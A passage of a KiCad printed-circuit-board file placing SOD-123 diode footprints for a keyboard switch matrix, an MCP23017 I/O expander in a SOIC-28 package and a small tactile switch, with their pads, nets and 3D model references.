(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 42 "Net-(D0_8-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 26 /row1,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBCA6)
(at 229 36.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AED8)
(attr smd)
(fp_text reference D0_9 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 43 "Net-(D0_9-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 26 /row1,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBD78)
(at 172 61.75 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AE79)
(attr smd)
(fp_text reference D2_6 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 60 "Net-(D2_6-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 32 /row1,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBD24)
(at 191 37.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AE3E)
(attr smd)
(fp_text reference D1_7 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 51 "Net-(D1_7-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 27 /row1,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Package_SO:SOIC-28W_7.5x17.9mm_P1.27mm (layer F.Cu) (tedit 5D9F72B1) (tstamp 5EDC4344)
(at 136.67 66.14)
(descr "SOIC, 28 Pin (JEDEC MS-013AE, https://www.analog.com/media/en/package-pcb-resources/package/35833120341221rw_28.pdf), generated with kicad-footprint-generator ipc_gullwing_generator.py")
(tags "SOIC SO")
(path /5ED65123)
(attr smd)
(fp_text reference U2 (at 0 -9.9) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value MCP23017_SO (at 0 9.9) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 0 9.06) (end 3.86 9.06) (layer F.SilkS) (width 0.12))
(fp_line (start 3.86 9.06) (end 3.86 8.815) (layer F.SilkS) (width 0.12))
(fp_line (start 0 9.06) (end -3.86 9.06) (layer F.SilkS) (width 0.12))
(fp_line (start -3.86 9.06) (end -3.86 8.815) (layer F.SilkS) (width 0.12))
(fp_line (start 0 -9.06) (end 3.86 -9.06) (layer F.SilkS) (width 0.12))
(fp_line (start 3.86 -9.06) (end 3.86 -8.815) (layer F.SilkS) (width 0.12))
(fp_line (start 0 -9.06) (end -3.86 -9.06) (layer F.SilkS) (width 0.12))
(fp_line (start -3.86 -9.06) (end -3.86 -8.815) (layer F.SilkS) (width 0.12))
(fp_line (start -3.86 -8.815) (end -5.675 -8.815) (layer F.SilkS) (width 0.12))
(fp_line (start -2.75 -8.95) (end 3.75 -8.95) (layer F.Fab) (width 0.1))
(fp_line (start 3.75 -8.95) (end 3.75 8.95) (layer F.Fab) (width 0.1))
(fp_line (start 3.75 8.95) (end -3.75 8.95) (layer F.Fab) (width 0.1))
(fp_line (start -3.75 8.95) (end -3.75 -7.95) (layer F.Fab) (width 0.1))
(fp_line (start -3.75 -7.95) (end -2.75 -8.95) (layer F.Fab) (width 0.1))
(fp_line (start -5.93 -9.2) (end -5.93 9.2) (layer F.CrtYd) (width 0.05))
(fp_line (start -5.93 9.2) (end 5.93 9.2) (layer F.CrtYd) (width 0.05))
(fp_line (start 5.93 9.2) (end 5.93 -9.2) (layer F.CrtYd) (width 0.05))
(fp_line (start 5.93 -9.2) (end -5.93 -9.2) (layer F.CrtYd) (width 0.05))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 28 smd roundrect (at 4.65 -8.255) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 27 smd roundrect (at 4.65 -6.985) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 26 smd roundrect (at 4.65 -5.715) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 25 smd roundrect (at 4.65 -4.445) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 24 /col9))
(pad 24 smd roundrect (at 4.65 -3.175) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 15 /col8))
(pad 23 smd roundrect (at 4.65 -1.905) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 21 /col7))
(pad 22 smd roundrect (at 4.65 -0.635) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 20 /col6))
(pad 21 smd roundrect (at 4.65 0.635) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 16 /col5))
(pad 20 smd roundrect (at 4.65 1.905) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 19 smd roundrect (at 4.65 3.175) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 18 smd roundrect (at 4.65 4.445) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 72 "Net-(R9-Pad1)"))
(pad 17 smd roundrect (at 4.65 5.715) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 34 VSS))
(pad 16 smd roundrect (at 4.65 6.985) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 34 VSS))
(pad 15 smd roundrect (at 4.65 8.255) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 34 VSS))
(pad 14 smd roundrect (at -4.65 8.255) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 13 smd roundrect (at -4.65 6.985) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 12 "Net-(Jack1-PadR1)"))
(pad 12 smd roundrect (at -4.65 5.715) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 13 "Net-(Jack1-PadT)"))
(pad 11 smd roundrect (at -4.65 4.445) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 10 smd roundrect (at -4.65 3.175) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 34 VSS))
(pad 9 smd roundrect (at -4.65 1.905) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 33 VDD))
(pad 8 smd roundrect (at -4.65 0.635) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 7 smd roundrect (at -4.65 -0.635) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 6 smd roundrect (at -4.65 -1.905) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 5 smd roundrect (at -4.65 -3.175) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25))
(pad 4 smd roundrect (at -4.65 -4.445) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 31 /row1,3))
(pad 3 smd roundrect (at -4.65 -5.715) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 32 /row1,2))
(pad 2 smd roundrect (at -4.65 -6.985) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 27 /row1,1))
(pad 1 smd roundrect (at -4.65 -8.255) (size 2.05 0.6) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.25)
(net 26 /row1,0))
(model ${KISYS3DMOD}/Package_SO.3dshapes/SOIC-28W_7.5x17.9mm_P1.27mm.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBD4E)
(at 210 43.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AEBA)
(attr smd)
(fp_text reference D1_8 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 52 "Net-(D1_8-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 27 /row1,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBDE8)
(at 191 56.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AE83)
(attr smd)
(fp_text reference D2_7 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 61 "Net-(D2_7-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 32 /row1,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBD94)
(at 229 74.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AF00)
(attr smd)
(fp_text reference D2_9 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 63 "Net-(D2_9-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 32 /row1,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBCDE)
(at 153 45.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3ADDD)
(attr smd)
(fp_text reference D1_5 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 49 "Net-(D1_5-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 27 /row1,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Button_Switch_SMD:SW_SPST_B3U-1000P (layer F.Cu) (tedit 5A02FC95) (tstamp 5F0032F9)
(at 42 83.5 90)
(descr "Ultra-small-sized Tactile Switch with High Contact Reliability, Top-actuated Model, without Ground Terminal, without Boss")
(tags "Tactile Switch")
(path /5ECF50EB)
(attr smd)
(fp_text reference SW1 (at 0 -2.5 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value SW_PUSH (at 0 2.5 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.4 1.65) (end 2.4 1.65) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.4 1.65) (end 2.4 -1.65) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.4 -1.65) (end -2.4 -1.65) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.4 -1.65) (end -2.4 1.65) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.65 1.1) (end -1.65 1.4) (layer F.SilkS) (width 0.12))
(fp_line (start -1.65 1.4) (end 1.65 1.4) (layer F.SilkS) (width 0.12))
(fp_line (start 1.65 1.4) (end 1.65 1.1) (layer F.SilkS) (width 0.12))
(fp_line (start -1.65 -1.1) (end -1.65 -1.4) (layer F.SilkS) (width 0.12))
(fp_line (start -1.65 -1.4) (end 1.65 -1.4) (layer F.SilkS) (width 0.12))
(fp_line (start 1.65 -1.4) (end 1.65 -1.1) (layer F.SilkS) (width 0.12))
(fp_line (start -1.5 -1.25) (end 1.5 -1.25) (layer F.Fab) (width 0.1))
(fp_line (start 1.5 -1.25) (end 1.5 1.25) (layer F.Fab) (width 0.1))
(fp_line (start 1.5 1.25) (end -1.5 1.25) (layer F.Fab) (width 0.1))
(fp_line (start -1.5 1.25) (end -1.5 -1.25) (layer F.Fab) (width 0.1))
(fp_circle (center 0 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_text user %V (at 1.18 0.01 180) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 1 smd rect (at -1.7 0 90) (size 0.9 1.7) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 2 smd rect (at 1.7 0 90) (size 0.9 1.7) (layers F.Cu F.Paste F.Mask)
(net 22 "Net-(R1-Pad1)"))
(model ${KISYS3DMOD}/Button_Switch_SMD.3dshapes/SW_SPST_B3U-1000P.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAAE47)
(at 112.3 90.9 150)
(descr SOD-123)
(tags SOD-123)
(path /5EF1DFD1)
(attr smd)
(fp_text reference D3_4 (at 0 -2 150) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1 150) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
